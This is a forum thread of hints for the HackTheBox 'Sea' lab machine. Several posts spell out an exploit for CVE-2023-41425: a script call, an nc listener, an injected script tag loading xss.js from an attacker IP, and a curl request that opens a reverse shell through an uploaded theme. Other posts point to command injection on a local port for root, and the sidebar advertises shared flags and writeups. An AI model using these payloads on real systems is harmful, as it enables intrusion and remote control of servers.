[HTB] Sea - Machine
by RedTeamer - Friday August 9, 2024 at 08:04 PM
#71
Machine rooted feel free to DM me if need be
Reply
#72
(Aug 10, 2024, 10:45 PM)KimmyXD Wrote: hello can anyone tell me how did you ger the reverse shell

you need run this exploit 
https://github.com/prodigiousMind/CVE-2023-41425

generate xss.js

run xss.js via contact form (website)

and use new theme revshell-main Wink

(Aug 10, 2024, 10:46 PM)kewlcat002 Wrote: Machine rooted feel free to DM me if need be

GJ, congrats. Only hint me. To privesc use chrome, port 8080 or 42743 ?
Reply
#73
(Aug 10, 2024, 10:48 PM)upl04d3r Wrote: GJ, congrats. Only hint me. To privesc use chrome, port 8080 or 42743 ?
port 8080, log analyzer, there's the cmd injection.
Reply
#74
Not able to respond to DMs due to Forbidden error but the way to root is via command injection on localhost 8080. You may need to escape it with another simple payload to get it to work fully
Reply
#75
(Aug 10, 2024, 10:45 PM)OffensiveBias Wrote:
(Aug 10, 2024, 10:41 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where
 some one help me

python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx

It willl then tell you 

nc -lvp xxxx
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="

send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'


thanks bro
Reply
#76
(Aug 10, 2024, 10:53 PM)peRd1 Wrote:
(Aug 10, 2024, 10:48 PM)upl04d3r Wrote: GJ, congrats. Only hint me. To privesc use chrome, port 8080 or 42743 ?
port 8080, log analyzer, there's the cmd injection.

for root?
Reply
#77
(Aug 10, 2024, 10:55 PM)kewlcat002 Wrote: Not able to respond to DMs due to Forbidden error but the way to root is via command injection on localhost 8080. You may need to escape it with another simple payload to get it to work fully

         means?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB | Trying to sell information posted for free
Reply
#78
(Aug 10, 2024, 10:55 PM)kewlcat002 Wrote: Not able to respond to DMs due to Forbidden error but the way to root is via command injection on localhost 8080. You may need to escape it with another simple payload to get it to work fully

Thx you very much for the hint !!!
Reply
#79
(Aug 10, 2024, 10:53 PM)peRd1 Wrote:
(Aug 10, 2024, 10:48 PM)upl04d3r Wrote: GJ, congrats. Only hint me. To privesc use chrome, port 8080 or 42743 ?
port 8080, log analyzer, there's the cmd injection.

My machine doesn't have this door open, I think someone closed it, or do I have to do something to upload the application?
Reply
#80
(Aug 10, 2024, 11:11 PM)gihimlek Wrote:
(Aug 10, 2024, 11:02 PM)DeDeLaPouille Wrote:
(Aug 10, 2024, 10:55 PM)kewlcat002 Wrote: Not able to respond to DMs due to Forbidden error but the way to root is via command injection on localhost 8080. You may need to escape it with another simple payload to get it to work fully

Thx you very much for the hint !!!

Can you give me a direction on escaping the string and execute command?

@kewlcat002 already gave a good hint, it's hard to tell you without givin away the answer. Just don't overthink it.  The important part in the hint is "You may need to escape it with another simple payload to get it to work fully"
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,939 8 hours ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,584 8 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,799 9 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,615 Today, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,268 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)